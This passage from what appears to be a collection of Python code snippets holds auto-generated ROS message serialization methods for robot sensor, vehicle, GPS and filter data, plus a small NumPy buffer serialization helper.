_x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_12d().pack(_x.sensor_pose_on_robot.position.x, _x.sensor_pose_on_robot.position.y, _x.sensor_pose_on_robot.position.z, _x.sensor_pose_on_robot.orientation.x, _x.sensor_pose_on_robot.orientation.y, _x.sensor_pose_on_robot.orientation.z, _x.sensor_pose_on_robot.orientation.w, _x.min_sensor_distance, _x.max_sensor_distance, _x.sensor_std_range, _x.sensor_std_yaw, _x.sensor_std_pitch))\n length = len(self.sensed_data)\n buff.write(_struct_I.pack(length))\n for val1 in self.sensed_data:\n _x = val1\n buff.write(_get_struct_3di().pack(_x.range, _x.yaw, _x.pitch, _x.id))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_H6B5f2Bf.pack(_x.sensorId, _x.id, _x.length, _x.width, _x.measstat, _x.existprob, _x.dynprop, _x.latdisp, _x.longdisp, _x.relxdot, _x.relxddot, _x.latspeed, _x.obsprob, _x.rollcount, _x.rcs))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_2H().pack(_x.image_width, _x.image_height))\n length = len(self.Hlines)\n buff.write(_struct_I.pack(length))\n for val1 in self.Hlines:\n _x = val1\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n length = len(self.Vlines)\n buff.write(_struct_I.pack(length))\n for val1 in self.Vlines:\n _x = val1\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n buff.write(_get_struct_H().pack(self.PFPS))\n length = len(self.regions)\n buff.write(_struct_I.pack(length))\n for val1 in self.regions:\n _v5 = val1.color\n _x = _v5\n buff.write(_get_struct_4f().pack(_x.r, _x.g, _x.b, _x.a))\n _v6 = val1.moment\n _x = _v6\n buff.write(_get_struct_10f().pack(_x.m00, _x.m10, _x.m01, _x.m11, _x.m20, _x.m02, _x.m21, _x.m12, _x.m30, _x.m03))\n _x = self\n buff.write(_get_struct_2H().pack(_x.box_width, _x.box_height))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_2q3d3q().pack(_x.max_features, _x.window_size, _x.quality, _x.min_distance, _x.harris, _x.size_block, _x.pyramid_lvl, _x.mask_border))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_I().pack(self.vehicle_id.id))\n _x = self.vehicle_id.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_21f().pack(_x.left_size, _x.right_size, _x.front_size, _x.rear_size, _x.min_height, _x.max_height, _x.payload, _x.max_pos_x_vel, _x.max_neg_x_vel, _x.max_pos_x_acc, _x.max_neg_x_acc, _x.max_pos_y_vel, _x.max_neg_y_vel, _x.max_pos_y_acc, _x.max_neg_y_acc, _x.max_pos_ang_vel, _x.max_neg_ang_vel, _x.velocity_control_sensitivity, _x.min_turning_radius, _x.batt_capacity, _x.batt_max_voltage))\n _x = self.vehicle_type\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.vendor\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.action_capability)\n buff.write(_struct_I.pack(length))\n for val1 in self.action_capability:\n _x = val1\n buff.write(_get_struct_2B().pack(_x.category, _x.action))\n length = len(val1.attributes)\n buff.write(_struct_I.pack(length))\n for val2 in val1.attributes:\n _x = val2.type\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_I2di6h8fI().pack(_x.health, _x.utcA0, _x.utcA1, _x.utcTOW, _x.utcWNT, _x.utcLS, _x.utcWNF, _x.utcDN, _x.utcLSF, _x.utcSpare, _x.klobA0, _x.klobA1, _x.klobA2, _x.klobA3, _x.klobB0, _x.klobB1, _x.klobB2, _x.klobB3, _x.flags))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def _serialize_buffer(buffer, array_serialization=None):\n if array_serialization == 'binary':\n # WARNING: in NumPy 1.9, tostring() has been renamed to tobytes()\n # but tostring() is still here for now for backward compatibility.\n return buffer.ravel().tostring()\n elif array_serialization == 'base64':\n return {'storage_type': 'base64',\n 'buffer': base64.b64encode(buffer).decode('ascii')\n }\n raise ValueError(\"The array serialization method should be 'binary' or \"\n \"'base64'.\")", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n length = len(self.actors)\n buff.write(_struct_I.pack(length))\n for val1 in self.actors:\n _v17 = val1.header\n _x = _v17.seq\n buff.write(_get_struct_I().pack(_x))\n _v18 = _v17.stamp\n _x = _v18\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v17.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = val1.tracking_id\n buff.write(_get_struct_I().pack(_x))\n _v19 = val1.pose\n _v20 = _v19.pose\n _v21 = _v20.position\n _x = _v21\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n _v22 = _v20.orientation\n _x = _v22\n buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))\n buff.write(_v19.covariance.tostring())\n if len(val1.points) != 18:\n self._check_types(ValueError(\"Expecting %s items but found %s when writing '%s'\" % (18, len(val1.points), 'val1.points')))\n for val2 in val1.points:\n _v23 = val2.point\n _x = _v23\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n _x = val2.confidence\n buff.write(_get_struct_f().pack(_x))\n _v24 = val1.nose_point\n _x = _v24\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_B4bB.pack(_x.sbpl_wait_flag, _x.sbpl_present_x, _x.sbpl_present_y, _x.sbpl_new_x, _x.sbpl_new_y, _x.start_P3DX_motion))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n buff.write(self.Rscanpose.tostring())\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.type_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_4f.pack(_x.home.latitude, _x.home.longitude, _x.home.altitude, _x.home.heading))\n length = len(self.movements)\n buff.write(_struct_I.pack(length))\n for val1 in self.movements:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_b.pack(val1.type))\n length = len(val1.pre_actions)\n buff.write(_struct_I.pack(length))\n for val2 in val1.pre_actions:\n _x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_b.pack(val2.type))\n _x = val2.action_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.parameters)\n buff.write(_struct_I.pack(length))\n for val3 in val2.parameters:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.slot_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.receivers_name)\n buff.write(_struct_I.pack(length))\n for val3 in val2.receivers_name:\n length = len(val3)\n if python3 or type(val3) == unicode:\n val3 = val3.encode('utf-8')\n length = len(val3)\n buff.write(struct.pack('<I%ss'%length, length, val3))\n length = len(val1.post_actions)\n buff.write(_struct_I.pack(length))\n for val2 in val1.post_actions:\n _x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_b.pack(val2.type))\n _x = val2.action_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.parameters)\n buff.write(_struct_I.pack(length))\n for val3 in val2.parameters:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.slot_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.receivers_name)\n buff.write(_struct_I.pack(length))\n for val3 in val2.receivers_name:\n length = len(val3)\n if python3 or type(val3) == unicode:\n val3 = val3.encode('utf-8')\n length = len(val3)\n buff.write(struct.pack('<I%ss'%length, length, val3))\n buff.write(_struct_f.pack(val1.altitude))\n _v5 = val1.target_position\n _x = _v5\n buff.write(_struct_4f.pack(_x.latitude, _x.longitude, _x.altitude, _x.heading))\n buff.write(_struct_b.pack(val1.strategy))\n _v6 = val1.duration\n _x = _v6\n buff.write(_struct_2i.pack(_x.secs, _x.nsecs))\n _x = val1\n buff.write(_struct_2fBf.pack(_x.radius, _x.circle_altitude, _x.clockwise, _x.direction))\n length = len(self.move_transitions)\n buff.write(_struct_I.pack(length))\n for val1 in self.move_transitions:\n buff.write(_struct_B.pack(val1.is_choice))\n _x = val1.wait_for_slot_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.from_move_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.to_move_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_B.pack(val1.fluid))\n _x = val1.condition_identifier\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.false_branch_move_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.slot_names)\n buff.write(_struct_I.pack(length))\n for val1 in self.slot_names:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n buff.write(_struct_b.pack(self.travel_mode))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_56B().pack(_x.command, _x.set_num, _x.paraset_byte54, _x.paraset_byte53, _x.paraset_byte52, _x.paraset_byte51, _x.paraset_byte50, _x.paraset_byte49, _x.paraset_byte48, _x.paraset_byte47, _x.paraset_byte46, _x.paraset_byte45, _x.paraset_byte44, _x.paraset_byte43, _x.paraset_byte42, _x.paraset_byte41, _x.paraset_byte40, _x.paraset_byte39, _x.paraset_byte38, _x.paraset_byte37, _x.paraset_byte36, _x.paraset_byte35, _x.paraset_byte34, _x.paraset_byte33, _x.paraset_byte32, _x.paraset_byte31, _x.paraset_byte30, _x.paraset_byte29, _x.paraset_byte28, _x.paraset_byte27, _x.paraset_byte26, _x.paraset_byte25, _x.paraset_byte24, _x.paraset_byte23, _x.paraset_byte22, _x.paraset_byte21, _x.paraset_byte20, _x.paraset_byte19, _x.paraset_byte18, _x.paraset_byte17, _x.paraset_byte16, _x.paraset_byte15, _x.paraset_byte14, _x.paraset_byte13, _x.paraset_byte12, _x.paraset_byte11, _x.paraset_byte10, _x.paraset_byte9, _x.paraset_byte8, _x.paraset_byte7, _x.paraset_byte6, _x.paraset_byte5, _x.paraset_byte4, _x.paraset_byte3, _x.paraset_byte2, _x.paraset_byte1))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_didid.pack(_x.distance_front, _x.angle_front, _x.distance_back, _x.angle_back, _x.turn_left))\n _x = self.turn_left_sensor\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_d.pack(self.turn_right))\n _x = self.turn_right_sensor\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_6f.pack(_x.major_ax, _x.minor_ax, _x.coup_strength, _x.limit_cycle, _x.forward_velocity, _x.curvature))\n length = len(self.x_offset)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.x_offset.tostring())\n length = len(self.y_offset)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.y_offset.tostring())\n length = len(self.coupling_1)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(self.coupling_1.tostring())\n length = len(self.coupling_2)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(self.coupling_2.tostring())\n length = len(self.coupling_3)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(self.coupling_3.tostring())\n length = len(self.coupling_4)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(self.coupling_4.tostring())\n length = len(self.coupling_5)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(self.coupling_5.tostring())\n length = len(self.coupling_6)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(self.coupling_6.tostring())\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.compatibility\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.display_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.namespace\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.icon.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.icon.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.icon.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.remappings)\n buff.write(_struct_I.pack(length))\n for val1 in self.remappings:\n _x = val1.remap_from\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.remap_to\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.parameters\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.max))\n _x = self.pairing.rapp\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.pairing.remappings)\n buff.write(_struct_I.pack(length))\n for val1 in self.pairing.remappings:\n _x = val1.remap_from\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.remap_to\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.pairing.parameters)\n buff.write(_struct_I.pack(length))\n for val1 in self.pairing.parameters:\n _x = val1.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.hash))\n _x = self.role\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_5B6fi2f().pack(_x.enable_steering, _x.enable_braking, _x.enable_driving, _x.enable_Estop, _x.enable_gear, _x.sw_deg, _x.sw_rad, _x.speed_ms, _x.speed_kms, _x.ax_ms2, _x.omega_rad, _x.gear_mode, _x.steering, _x.speed))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_QBdB2I().pack(_x.step_num, _x.info_type, _x.predict.step_dt, _x.predict.trans_jacobian.column_major, _x.predict.trans_jacobian.rows, _x.predict.trans_jacobian.cols))\n length = len(self.predict.trans_jacobian.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.predict.trans_jacobian.data.tostring())\n _x = self\n buff.write(_get_struct_B2I().pack(_x.predict.trans_noise_cov.column_major, _x.predict.trans_noise_cov.rows, _x.predict.trans_noise_cov.cols))\n length = len(self.predict.trans_noise_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.predict.trans_noise_cov.data.tostring())\n _x = self\n buff.write(_get_struct_B2I().pack(_x.predict.prior_state_cov.column_major, _x.predict.prior_state_cov.rows, _x.predict.prior_state_cov.cols))\n length = len(self.predict.prior_state_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.predict.prior_state_cov.data.tostring())\n _x = self\n buff.write(_get_struct_B2I().pack(_x.predict.post_state_cov.column_major, _x.predict.post_state_cov.rows, _x.predict.post_state_cov.cols))\n length = len(self.predict.post_state_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.predict.post_state_cov.data.tostring())\n _x = self\n buff.write(_get_struct_B2I().pack(_x.update.prior_state_cov.column_major, _x.update.prior_state_cov.rows, _x.update.prior_state_cov.cols))\n length = len(self.update.prior_state_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.update.prior_state_cov.data.tostring())\n length = len(self.update.prior_obs_error)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.update.prior_obs_error.tostring())\n _x = self\n buff.write(_get_struct_B2I().pack(_x.update.obs_error_cov.column_major, _x.update.obs_error_cov.rows, _x.update.obs_error_cov.cols))\n length = len(self.update.obs_error_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.update.obs_error_cov.data.tostring())\n _x = self\n buff.write(_get_struct_B2I().pack(_x.update.post_state_cov.column_major, _x.update.post_state_cov.rows, _x.update.post_state_cov.cols))\n length = len(self.update.post_state_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.update.post_state_cov.data.tostring())\n length = len(self.update.state_delta)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.update.state_delta.tostring())\n length = len(self.update.post_obs_error)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.update.post_obs_error.tostring())\n _x = self\n buff.write(_get_struct_B2I().pack(_x.update.obs_jacobian.column_major, _x.update.obs_jacobian.rows, _x.update.obs_jacobian.cols))\n length = len(self.update.obs_jacobian.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.update.obs_jacobian.data.tostring())\n _x = self\n buff.write(_get_struct_B2I().pack(_x.update.obs_noise_cov.column_major, _x.update.obs_noise_cov.rows, _x.update.obs_noise_cov.cols))\n length = len(self.update.obs_noise_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.update.obs_noise_cov.data.tostring())\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_3I().pack(_x.x.header.seq, _x.x.header.stamp.secs, _x.x.header.stamp.nsecs))\n _x = self.x.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_7d3I().pack(_x.x.pose.position.x, 